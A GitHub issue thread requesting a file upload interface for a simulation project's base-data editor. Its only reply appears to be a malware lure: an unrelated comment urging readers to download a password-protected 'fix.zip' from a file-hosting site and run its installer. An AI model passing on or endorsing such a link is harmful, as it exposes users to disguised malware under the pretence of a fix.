### ISSUE TITLE
Add file upload interface for base-data

### ISSUE THREAD

**Issue by YIllmann** [MANVSim/MANVSim#267]
Despite of being a future work issue the base-data editor, require a file upload interface. Therefore an editor shall be opened by clicking on "Bearbeiten" on the website opening a small window for the media upload.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
